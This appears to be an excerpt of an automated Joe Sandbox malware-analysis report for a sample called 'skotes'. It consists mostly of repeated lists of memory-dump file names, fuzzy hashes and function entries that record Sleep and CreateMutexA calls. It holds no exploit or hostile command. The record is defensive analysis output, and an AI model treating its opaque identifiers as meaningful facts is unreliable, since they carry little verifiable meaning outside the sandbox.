Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3a2dac3de0b3bd14ed541fc28d5a7ba56f45fe0ac30618ac54ae583a0d3fd4e7
Instruction ID: f319fab88419592d52439bab6648600c5b52c09e9e0dbce104860a3568f4ab9e
Opcode Fuzzy Hash: 3a2dac3de0b3bd14ed541fc28d5a7ba56f45fe0ac30618ac54ae583a0d3fd4e7
Instruction Fuzzy Hash: 2D317E31B052048FFB08EB78DC897ADB7B6EFD2310F248258E024973D6C7755A808791

Function 00909F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: accf6ad63b6297bfa14c1c87b1373d653fd935346d037f2b7f4c8a79f593e99f
Instruction ID: 4c5912ebd038d1e4aa28cce036ce90535f2c4010656aadbd61e81b92212689a0
Opcode Fuzzy Hash: accf6ad63b6297bfa14c1c87b1373d653fd935346d037f2b7f4c8a79f593e99f
Instruction Fuzzy Hash: 0C314D317052059FEB18EB78DC857ADB7B6EBC6310F248618E024D72D5C77559808792

Function 0090A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2844448d06fbddd3ba150b1d127d55b32036dde030f3de871aeac002317d028a
Instruction ID: 4066285ed91f8777887d3baefa57c5ef823be2fc5d0c9d4fca81283f85920061
Opcode Fuzzy Hash: 2844448d06fbddd3ba150b1d127d55b32036dde030f3de871aeac002317d028a
Instruction Fuzzy Hash: CB3148317143089FEB08DBB8DC89BADB776EBC2314F248618E024973D5C77699808B92

Function 0090A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e7b4c14265c66738f6f65b8589a6f1b0cd61f25b26d7d9fac40b5736431585d5
Instruction ID: 686b02d4298b376c55795cb13ecd43f6be8e0f3800675e730749ab23ab6b0707
Opcode Fuzzy Hash: e7b4c14265c66738f6f65b8589a6f1b0cd61f25b26d7d9fac40b5736431585d5
Instruction Fuzzy Hash: B53128317053059FEB08DBBCDC897ADB776EBC6310F248618E024972D5D77699C09792

Function 0090A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525319791.0000000000B7F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525336840.0000000000B80000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525357364.0000000000B88000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000B89000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525376078.0000000000BC9000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525430181.0000000000BDE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525478202.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525495881.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525608468.0000000000BF4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525656892.0000000000BF5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525912586.0000000000BFC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526059021.0000000000C0B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1526087920.0000000000C0C000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2f7df8a20ab07778db1a709a28b201ed0d5ccdf410557deb9a4b4609990846fa
Instruction ID: 244291c176641a647a153e5d777cbebcf375ac025c6a63bff079ef6a1d1b405d
Opcode Fuzzy Hash: 2f7df8a20ab07778db1a709a28b201ed0d5ccdf410557deb9a4b4609990846fa
Instruction Fuzzy Hash: 40312831B043049FEB08EBB8DCC9BADB776EFD1314F248218E0649B2D5D7B559809B92

Function 0090A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0090A963
CreateMutexA.KERNELBASE(00000000,00000000,00963254), ref: 0090A981

Memory Dump Source

Source File: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.1524157327.0000000000900000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524174368.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524227777.0000000000969000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524242520.000000000096B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524259652.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524376644.0000000000AC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524392904.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524451309.0000000000AF1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524466916.0000000000AF2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524485077.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524499934.0000000000B00000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524515004.0000000000B01000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524529849.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524544527.0000000000B03000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524559755.0000000000B04000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524579261.0000000000B18000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524594685.0000000000B1A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524609834.0000000000B1C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524634271.0000000000B2E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524664536.0000000000B44000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524680248.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524696704.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524714794.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524731398.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524748370.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1524764787.0000000000B67000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525091086.0000000000B6A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525110092.0000000000B6B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525262166.0000000000B6E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525281913.0000000000B76000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1525300505.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
